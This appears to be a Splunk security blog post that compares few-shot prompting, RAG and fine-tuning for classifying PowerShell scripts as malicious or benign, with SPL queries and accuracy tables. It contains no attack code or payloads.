Defending at Machine Speed: Guiding LLMs with Security Context

Large Language Models (LLMs) provide strong reasoning and data summarization capabilities, making them valuable proxies for a variety of cybersecurity operations tasks. However, their performance can decline when applied to highly specific or enterprise-contextual tasks, particularly if the models rely solely on public internet data.

This research explores methods to guide LLMs toward targeted security objectives — specifically through continuing our exploration of methods for the classification of PowerShell scripts. By adapting our DSDL workflow to include few-shot learning, Retrieval Augmented Generation (RAG), and fine-tuning, we evaluate the potential performance gains and trade-offs across each technique.

Few-Shot Learning: Teaching by Example

Our first method builds on the prompt of our baseline test, where we asked various open-weight models to perform PowerShell classification in the Splunk platform. Few-shot learning provides the model with a handful of examples, along with their labels, to assist in a classification task. Giving the model a few labeled examples (typically 1 to 5), can help it learn a pattern, or attributes that differentiate the underlying classes. The amount of examples to use is a consideration of the model's context length. The context length includes your prompt, any example inputs, instructions, and the model’s own responses. Tokens, roughly corresponding to words or word-parts, are the units that fill this space.

For example, If a model has a 4,000-token context length, you can prompt it with a few paragraphs of text, several examples, and a task description — as long as the total length stays under 4,000 tokens. If you exceed that limit, the model will either ignore earlier content or fail to respond correctly. With a larger context length, users can include dozens or even hundreds of examples in the prompt — a technique called many-shot learning, which often can provide better performance in addition to this on-the-fly flexibility.

In our model for this test, Llama3-8B, supports a context length of approximately 8,000 tokens. After calculating the average script length in our dataset, six examples (three per class) could be accommodated without truncation. Will just a few examples be enough to improve PowerShell classification accuracy?

For this test we manually modified DSDL’s llm_rag_ollama_text_processing notebook to append the examples directly into the prompt, then using SPL to initiate and analyze the results:

index="powershell_encoded" encoded=*
| eval seed="19844"
| eval hash_val = tonumber(substr(md5(seed . label . Content), 1, 8), 16)
| eval rand_val = hash_val / **********
| eventstats count AS total_count BY label
| sort label rand_val
| streamstats count AS class_count BY label
| where class_count <= 500
| table Content, label
| rename Content as text
| fit MLTKContainer algo=RF_llm_rag_ollama_text_processing_megaprompt model_name="llama3" prompt="You are a cybersecurity expert. Classify the intent of the PowerShell script. Choose from 'malicious' or 'benign'. Only output the category name in your answer." text into app:RF_llm_rag_ollama_text_processing as LLM

Findings

With just a handful of examples, we observed a boost in the precision and accuracy of the model by +8% and +6% respectively for PowerShell classification. These measures translate to an increase in the correct identification of true positive malicious scripts, with no added cost in the form of average response time.

Baseline

Few-Shot Learning

Method

Precision

Recall

Accuracy

Avg Response

Baseline

0.78

1.00

0.86

0.87

0.74 seconds

Few-Shot Learning

0.86

0.99

0.92

0.74 seconds

Here are some other tips for getting the most out of few-shot learning:

Know your model’s context length! Too many examples can create “context overflow”, resulting in your input getting truncated. This typically means the earliest/oldest content gets cut-off by the context length.
Remember models think in tokens, not characters. As a rough estimate, 100 tokens ≈ 75 words ≈ 400 characters.
Use representative samples for few-shot learning that are diverse, but relevant. For example, in this case, don’t pick three malicious examples that are using the same Invoke-WebRequest cmdlet.
Balance your classes! You may think the model just needs to see malicious examples, however this can actually cause the model to overgeneralize, which may lead to predicting the malicious class too often.

Retrieval Augmented Generation (RAG): Memory On-Demand

Our second method, RAG, ups the technical complexity a bit, with the aim of also improving accuracy to a level worth the effort. RAG uses a vector database to store encoded data that is retrieved to help provide context in relation to a prompt submitted to the model by the user. To use RAG with DSDL, you must run the Milvus container through Ollama.

To support PowerShell classification, we first embed a series of malicious and benign scripts as vector data, using the ‘DSDL Encoding Assistant’. Once the data is embedded (represented as numerical vectors) in the Milvus database, we use the LLM-RAG Assistant, or llm_rag_script notebook to query the model, with the new collection of data for context. The parameter top_k controls how many retrieved examples (PowerShell script samples) are selected based on their vector similarity to the input query.

To put all of this in context, when the model begins its classification reasoning on a new sample, it will first look at the script in question in vectorized form. Using RAG’s distance metrics, the model will retrieve the top_k closest samples for additional context to make a classification decision. Running this on our repeated random sample looks like:

index="powershell_encoded" encoded=*
| eval seed="19844"
| eval hash_val = tonumber(substr(md5(seed . label . Content), 1, 8), 16)
| eval rand_val = hash_val / 4294967295
| eventstats count AS total_count BY label
| sort label rand_val
| streamstats count AS class_count BY label
| where class_count <= 500
| table Content, label
| rename Content as query
| eval query = "You are a cybersecurity expert. Classify the intent of the PowerShell script. Choose from 'malicious' or 'benign'. Only output the category name in your answer." + query
| fit MLTKContainer algo=llm_rag_script model_name=llama3 embedder_name="all-MiniLM-L6-v2" use_local=1 embedder_dimension=384 collection_name=RAG_final top_k=2 rag_type=Documents query into app:llm_rag_script

Findings

Using RAG, we observed our biggest improvement in precision (+19%) and accuracy (+7%) from baseline yet, with some opportunity cost in recall and response time. In tasks like PowerShell classification, where malicious samples can vary wildly (e.g., obfuscation, LOLBins, encoded strings), it’s inefficient to pack dozens or hundreds of examples into a static prompt with few-shot learning. Instead, RAG can target only the most similar patterns using vector search, while avoiding irrelevant noise. Gathering this additional context does create a slight trade off in improved accuracy, for increased response time. Interestingly in this case, pulling the closest 4 examples (top_k=4) did not help improve the accuracy versus just pulling the closest two (top_k=2).

Stand-Alone Inference

Few-shot Learning

LLM-RAG

baseline

6 examples (3 malicious / 3 benign)

top_k=2

top_k=4

Method

Precision

Recall

Accuracy

Avg Response

Baseline

0.78

1.00

0.86

0.87

0.74 seconds

Few-shot Learning

0.86

0.99

0.92

0.74 seconds

LLM-RAG top_k:2

0.97

0.89

0.93

2.5 seconds

LLM-RAG top_k:4

0.96

0.89

0.93

0.92

6.3 seconds

Here are some other tips for getting the most out of RAG:

Don’t write off RAG because of the increased response time. RAG can be more effective and flexible than many-shot learning when the decision space is large or diverse, because it dynamically retrieves only the most relevant examples, rather than processing all examples in-context every time.
Keep in mind that RAG also relies on the size of the context length. Adjust your top_k, for best performance, but also to ensure you are staying within your boundaries!

Fine-Tuning: From Generalist to Specialist

The final option for targeting a particular security problem is to fine-tune an existing pre-trained model to your specific domain or use case. Fine-tuning builds on the general language knowledge and reasoning of the base model, but modifies the weights slightly in a training process based on additional data. Fine-tuning requirements vary depending on the method used, but can require significant investment of time, and financial and compute resources.

While we can fine-tune Llama3, its decoder-only architecture is more suited for text generation and reasoning tasks, not classification specifically. This year, Cisco’s Foundation AI team released Foundation-Sec-8B, an open-weight model fine-tuned for cybersecurity applications, based on the LLama3-8B model. The Foundation-Sec-8B model is a great asset for supporting a variety of generalized security use cases.

For the powershell classification task at hand, an encoder-only model like RoBERTa, which is specifically designed to encode meaningful representations of its trained data, is much better suited. To test the performance of this option alongside few-shot learning and RAG, we performed full fine-tuning to create a variant called neon-RoBERTa, which added a small neural network layer on top of the pretrained model to perform the binary PowerShell classification task.

Findings

Our fine-tuned, encoder-only model, shows how well we can optimize performance and accuracy when specializing in a narrow task, but with the highest level of resources invested into building a solution. Overall, this model boosts precision by 21%, and accuracy by 13%, while also improving classification time by 99% per sample. This model does not, however, have the inherent natural language abilities of a decoder model like Llama3, or the security domain knowledge of Foundation-Sec-8b – it only focuses on PowerShell classification.

Fine-Tuning

Method

Precision

Recall

Accuracy

Avg Response

Baseline

0.78

1.00

0.86

0.87

0.74 seconds

Few-shot Learning

0.86

0.99

0.92

0.74 seconds

LLM-RAG top_k:2

0.97

0.89

0.93

0.93

2.5 seconds

LLM-RAG top_k:4

0.96

0.89

0.93

0.92

6.3 seconds

Fine-tuning (RoBERTa)

0.99

0.98

0.99

7.7 micro-seconds

Here are some final considerations for fine-tuning:

Fine-tuning can be done to the level of a domain, or the detail of a specific task.
Modifying system instructions are a lightweight way to guide the model without fine-tuning.
While this example used full fine tuning on a smaller parameter model, larger models with billions of parameters can be fine-tuned on a budget with methods like QLoRA.
How you operationalize the model can significantly impact the response time, e.g. batching the inputs.

Conclusion

When applying LLMs to a security problem, there are many options available beyond your base prompt that can help guide the model to a better output. We’ve explored few-shot learning and RAG with DSDL, as well as fine-tuning, and measured significant improvements of these methods above our baseline prompt for PowerShell classification.

Few-shot learning and RAG rely on squeezing high-quality examples and relevant information into the context length to help guide the model’s output. The larger the length, the more context the model can use to reason effectively. When in doubt, consider adding some samples to your prompt. Even a small set of examples notably boosted performance in our test case. For more complex challenges, RAG demonstrated the ability to perform particularly well because of the ability to pull only the most relevant examples into context.

Fine-tuning can tailor a models’ knowledge towards better performance in a specific domain or task. Foundation models are best suited for multi-purpose use cases, but can be guided into performing classification. However, for best results on narrow tasks like security classification, it was simpler and faster to fine-tune an existing encoder-only model.

With the rapid pace of AI advancement, there are increasingly more analysis options and opportunities to apply them in cybersecurity. These tools and techniques can be extremely powerful at accelerating and improving detection efforts like in our model-in-the-loop threat hunting concept. We hope this research helps you better understand your options, and guides you towards getting the most out of your security data with Splunk!

Style

two-column

Predicting Cyber Fraud Through Real-World Events: Insights from Domain Registration Trends

Security

12 Minute Read

Predicting Cyber Fraud Through Real-World Events: Insights from Domain Registration Trends

By analyzing new domain registrations around major real-world events, researchers show how fraud campaigns take shape early, helping defenders spot threats before scams surface.

Security

4 Minute Read

When Your Fraud Detection Tool Doubles as a Wellness Check: The Unexpected Intersection of Security and HR

Behavioral analytics can spot fraud and burnout. With UEBA built into Splunk ES Premier, one data set helps security and HR reduce risk, retain talent, faster.

Security

1 Minute Read

Splunk Security Content for Threat Detection & Response: November Recap

Discover Splunk's November security content updates, featuring enhanced Castle RAT threat detection, UAC bypass analytics, and deeper insights for validating detections on research.splunk.com.

Security

2 Minute Read

Security Staff Picks To Read This Month, Handpicked by Splunk Experts

Our Splunk security experts share their favorite reads of the month so you can follow the most interesting, news-worthy, and innovative stories coming from the wide world of cybersecurity.

Behind the Walls: Techniques and Tactics in Castle RAT Client Malware

Security

10 Minute Read

Behind the Walls: Techniques and Tactics in Castle RAT Client Malware

Uncover CastleRAT malware's techniques (TTPs) and learn how to build Splunk detections using MITRE ATT&CK. Protect your network from this advanced RAT.

Security

12 Minute Read

AI for Humans: A Beginner’s Field Guide

Unlock AI with the our beginner's field guide. Demystify LLMs, Generative AI, and Agentic AI, exploring their evolution and critical cybersecurity applications.

Security

5 Minute Read

Splunk Security Content for Threat Detection & Response: November 2025 Update

Learn about the latest security content from Splunk.

Operation Defend the North: What High-Pressure Cyber Exercises Teach Us About Resilience and How OneCisco Elevates It

Security

3 Minute Read

Operation Defend the North: What High-Pressure Cyber Exercises Teach Us About Resilience and How OneCisco Elevates It

The OneCisco approach is not about any single platform or toolset; it's about fusing visibility, analytics, and automation into a shared source of operational truth so that teams can act decisively, even in the fog of crisis.

Data Fit for a Sovereign: How to Consider Sovereignty in Your Digital Resilience Strategy

Security

5 Minute Read

Data Fit for a Sovereign: How to Consider Sovereignty in Your Digital Resilience Strategy

Explore how digital sovereignty shapes resilient strategies for European organisations. Learn how to balance control, compliance, and agility in your data infrastructure with Cisco and Splunk’s flexible, secure solutions for the AI era.

/en_us/blog/fragments/about-splunk

/en_us/blog/fragments/subscribe-footer

Defending at Machine Speed: Guiding LLMs with Security Context

Few-Shot Learning: Teaching by Example

Findings

Retrieval Augmented Generation (RAG): Memory On-Demand

Findings

Fine-Tuning: From Generalist to Specialist

Findings

Conclusion

Related Articles